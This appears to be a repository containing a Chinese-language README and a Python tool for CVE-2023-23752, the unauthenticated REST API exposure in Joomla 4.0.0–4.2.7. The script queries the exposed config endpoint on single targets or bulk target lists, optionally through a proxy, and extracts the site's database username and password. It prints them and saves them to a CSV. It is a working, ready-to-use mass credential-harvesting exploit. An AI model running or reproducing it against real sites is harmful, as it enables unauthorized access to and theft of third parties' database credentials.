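├── README.md
└── CVE-2023-23752.py
/README.md:
--------------------------------------------------------------------------------
## CVE-2023-23752
Joomla 未授权访问漏洞 CVE-2023-23752

## 漏洞描述
Joomla是一款开源的内容管理系统(CMS),使用PHP编写,支持MySQL、MSSQL和PostgreSQL等多种数据库系统。访问限制不当导致未经授权访问服务器REST API接口。

>受影响版本:Joomla 4.0.0 - 4.2.7


## 使用帮助
```
optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定url地址
  -f FILE, --file FILE  指定文件
  -p PROXY, --proxy PROXY
                        设置代理,如socks5://127.0.0.1:8080 [clash]
  -o OUTPUT, --output OUTPUT
                        将结果输出到文件
```


## 使用示例
```
# 单个url
python CVE-2023-23752.py -u url

# 批量扫描,输出存在漏洞的url
python CVE-2023-23752.py -f file.txt -o out_file.csv

# 使用代理批量扫描
python CVE-2023-23752.py -f file.txt -p socks5://127.0.0.1:8080
```
--------------------------------------------------------------------------------
/CVE-2023-23752.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""Exposure check for CVE-2023-23752 (Joomla, affected range per README: 4.0.0 - 4.2.7).

Each target is queried once at ``/api/index.php/v1/config/application?public=true``;
if the response carries the application config (recognised by the ``user`` /
``password`` attributes the endpoint returns), the host is reported as exposed and
a row is appended to the CSV named by ``-o``. Network failures and non-exposed
hosts are reported on stdout only.
"""
import argparse
import csv
import re
import sys
import threading
import time

import requests

# REST path that is reachable without authentication on affected versions.
API_PATH = "/api/index.php/v1/config/application?public=true"

USER_AGENT = (
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
)

# Per-request timeout (seconds). Without one, a single unresponsive host
# blocks its worker thread indefinitely.
REQUEST_TIMEOUT = 10

# Compiled once; both patterns key on the attribute layout of the config payload.
USER_PATTERN = re.compile(r'\{"user":"(.*?)","id":')
PASSWORD_PATTERN = re.compile(r'\{"password":"(.*?)","id":')

# Serialises appends to the shared output file across worker threads.
_output_lock = threading.Lock()


def cmd_line():
    """Parse the command line; print help and exit when no arguments are given.

    Returns:
        argparse.Namespace with ``url``, ``file``, ``proxy`` and ``output``.
        ``output`` defaults to ``<unix time>.csv`` computed at parse time.
    """
    parse = argparse.ArgumentParser(
        description="Joomla 未授权访问漏洞 CVE-2023-23752",
        usage='''
python CVE-2023-23752.py -u url
python CVE-2023-23752.py -f file.txt
python CVE-2023-23752.py -f file.txt -o out_file.csv
python CVE-2023-23752.py -f file.txt -p socks5://127.0.0.1:8080
''', add_help=True)
    parse.add_argument('-u', '--url', help="指定url地址")
    parse.add_argument('-f', '--file', help="指定文件")
    parse.add_argument('-p', '--proxy', help="设置代理,如socks5://127.0.0.1:8080 [clash]")
    parse.add_argument('-o', '--output', help="将结果输出到文件", default=str(time.time()) + ".csv")

    # No arguments at all: behave as if -h was passed so the usage is shown.
    if len(sys.argv) == 1:
        sys.argv.append('-h')
    return parse.parse_args()


def _append_result(output_file, row):
    """Append one result row to *output_file* as CSV; safe to call from several threads.

    ``csv.writer`` quotes fields that contain commas or quotes, which the former
    ``'{0},{1},{2},{3}'`` join did not. ``lineterminator='\\n'`` keeps the file
    format the original produced.
    """
    with _output_lock:
        with open(output_file, 'a', encoding='utf-8', newline='') as f:
            csv.writer(f, lineterminator='\n').writerow(row)


def poc(url, proxy_server, output_file):
    """Probe one Joomla instance for CVE-2023-23752 and report the outcome on stdout.

    Args:
        url: base URL of the target, with or without a trailing slash.
        proxy_server: proxy URL used for both http and https, or None for a direct
            connection.
        output_file: CSV path that receives ``url, probe_url, user, password`` when
            the endpoint is exposed; a falsy value disables the file write.

    Returns:
        None. Request errors are reported, not raised, so a batch run continues.
    """
    # rstrip rather than strip: strip('/') would also remove a leading slash.
    url = str(url).rstrip('/')
    payload = "{}{}".format(url, API_PATH)
    header = {"User-Agent": USER_AGENT}

    # Keep the try body to the one call that can fail on the network, and catch
    # only requests' own errors so programming mistakes are not masked.
    try:
        response = requests.get(
            url=payload,
            proxies={"http": proxy_server, "https": proxy_server},
            headers=header,
            timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException:
        print("[!] URL连接失败![!] url: {}".format(url))
        return

    html = response.text
    user_match = USER_PATTERN.search(html)
    password_match = PASSWORD_PATTERN.search(html)

    # A page that merely contains the word "password" (e.g. a login form) is not
    # the config payload; previously that case raised IndexError on findall()[0]
    # and was mis-reported as a connection failure.
    if "password" not in html or user_match is None or password_match is None:
        print("[x] 未检测到漏洞![x] url: {}".format(url))
        return

    username = user_match.group(1)
    password = password_match.group(1)
    print("[+] 漏洞存在![✅]url: {}".format(url))
    print('用户名: ' + username)
    print('密码: ' + password)
    if output_file:
        _append_result(output_file, (url, payload, username, password))


def file(url, file, proxy_server, output_file):
    """Check every target listed in *file* (one URL per line), one thread per target.

    Args:
        url: unused; retained so the positional call in ``__main__`` is unchanged.
        file: path of the target list. Blank lines are skipped.
        proxy_server: forwarded to :func:`poc`.
        output_file: forwarded to :func:`poc`.

    All worker threads are joined before returning, so callers can rely on the
    output file being complete when this function returns.
    """
    with open(file, 'r', encoding='utf-8') as f:
        targets = [line.strip() for line in f if line.strip()]

    threads = [
        threading.Thread(target=poc, args=(target, proxy_server, output_file))
        for target in targets
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


if __name__ == "__main__":
    args = cmd_line()

    if args.file:
        file(args.url, args.file, args.proxy, args.output)
    elif args.url:
        poc(args.url, args.proxy, args.output)
    else:
        # Only -p/-o given: there is no target to check.
        sys.exit("[!] 需要通过 -u 或 -f 指定目标")
--------------------------------------------------------------------------------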